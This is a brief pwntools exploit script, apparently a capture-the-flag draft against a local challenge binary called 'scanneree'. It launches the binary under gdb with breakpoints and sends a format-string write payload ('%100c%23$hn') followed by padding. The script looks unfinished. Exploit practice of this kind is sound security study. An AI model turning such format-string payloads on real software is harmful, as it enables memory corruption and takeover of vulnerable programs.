#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./scanneree")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
# context.log_level='debug'
# p = remote("addr", 1337)
p = process([exe.path])
script="""
brva 0x000000000000121B
brva 0x120a

"""
def GDB():
    context.terminal = ["alacritty", "-e"]
    # gdb.attach(p, gdbscript=script)
    p = gdb.debug([exe.path], gdbscript=script)
    return p

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
p = GDB()
input()
sl(f"%{100}c%{0x17}$hn".ljust(50))
sl("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")









p.interactive()
# good luck pwning :)

